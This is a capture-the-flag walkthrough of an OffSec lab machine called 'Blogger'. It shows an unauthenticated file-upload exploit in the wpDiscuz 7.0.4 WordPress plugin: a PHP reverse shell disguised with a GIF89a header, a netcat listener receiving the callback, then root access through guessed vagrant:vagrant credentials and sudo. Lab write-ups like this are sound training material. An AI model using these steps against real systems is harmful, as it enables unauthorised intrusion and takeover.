Post

Blogger - Walkthrough

Posted Updated
By Vigneshwaran J
3 min read

Summary

In this guide we will exploit an arbitary file upload in the wpDiscuz version 7.0.4 plugin and obtain root access with a simple and straightforward method of privilege escalation.

Enumeration

We begin the enumeration process with an nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.120.183            

Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-05 04:19 MST
Nmap scan report for 192.168.120.183
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 23.40 seconds

We see ports 22 and 80 open on the target.

Navigating to port 80 we see the following static webpage.

Home

Home

Turning our attention to content discovery, we bruteforce directories with gobuster.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.120.183/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.120.183/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/08/04 07:37:35 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 319] [--> http://192.168.120.183/images/]
/assets               (Status: 301) [Size: 319] [--> http://192.168.120.183/assets/]
/css                  (Status: 301) [Size: 316] [--> http://192.168.120.183/css/]   
/js                   (Status: 301) [Size: 315] [--> http://192.168.120.183/js/]

Navigating to the assets directory, we find a blog directory in the assets/fonts path which reveals a wordpress site.

wp

wp

During our enumeration we skim through the source code of any blog post and see that the site uses the wpDiscuz version 7.0.4 plugin.

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali㉿kali)-[~]
└─$ curl http://blogger.pg/assets/fonts/blog/?p=29
<!DOCTYPE html>
<html lang="en-US">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="http://blogger.pg/assets/fonts/blog/xmlrpc.php">
......
<link rel='stylesheet' id='wpdiscuz-frontend-css-css'  href='http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/themes/default/style.css?ver=7.0.4' type='text/css' media='all' />

After researching the wpDiscuz version 7.0.4 plugin we see that it is vulnerable to an Unauthenticated Arbitrary File Upload.

Navigating to the comment section of any blog post, we see an upload form that accepts images.

comment section

comment section

As the comment section includes an upload form for images, we can attempt to upload a reverse shell in the GIF89a format, as it is common for any image upload functionality to allow GIFs as well.

We begin by grabbing a copy of a reverse shell to upload to the target, we will use the php-reverse-shell.php installed on kali by default.

1
2

┌──(kali㉿kali)-[~/blogger]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php .

We can add GIF89a; to the beginning of our php-reverse-shell to bypass any filters.

1
2
3
4
5

GIF89a;
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
...

Next, we set up up a listener on our attack machine.

1
2
3

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...

Now we navigate to the comment section of any blog post, and attach our php-reverse-shell.php and fill in the necessary forms before submitting.

upload

upload

We receive a response in our listener and stabilize our shell by spawning a python3 shell.

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.118.4] from (UNKNOWN) [192.168.120.150] 42538
Linux ubuntu-xenial 4.4.0-206-generic #238-Ubuntu SMP Tue Mar 16 07:52:37 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 15:39:15 up 58 min,  1 user,  load average: 0.04, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty1                      14:41   57:54   0.05s  0.03s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu-xenial:/$

Privilege Escalation

In the /home directory, we see the users james,ubuntu and vagrant.

1
2
3

www-data@ubuntu-xenial:/home$ ls
ls
james  ubuntu  vagrant

We can guess the credentials of the user vagrant as vagrant:vagrant.

1
2
3
4

www-data@ubuntu-xenial:/$ su vagrant
su vagrant
Password: vagrant
vagrant@ubuntu-xenial:/$

Running the “sudo -l” command reveals that the user vagrant is permitted to run all commands.

1
2
3
4
5
6
7
8
9

vagrant@ubuntu-xenial:/$ sudo -l
sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL) NOPASSWD: ALL

We can achieve root access by using sudo su.

1
2
3
4
5

vagrant@ubuntu-xenial:/$ sudo su 
sudo su 
root@ubuntu-xenial:/# id
id
uid=0(root) gid=0(root) groups=0(root)
Writeups, Offsec-Play
Offsec-Play OSCP
This post is licensed under CC BY 4.0 by the author.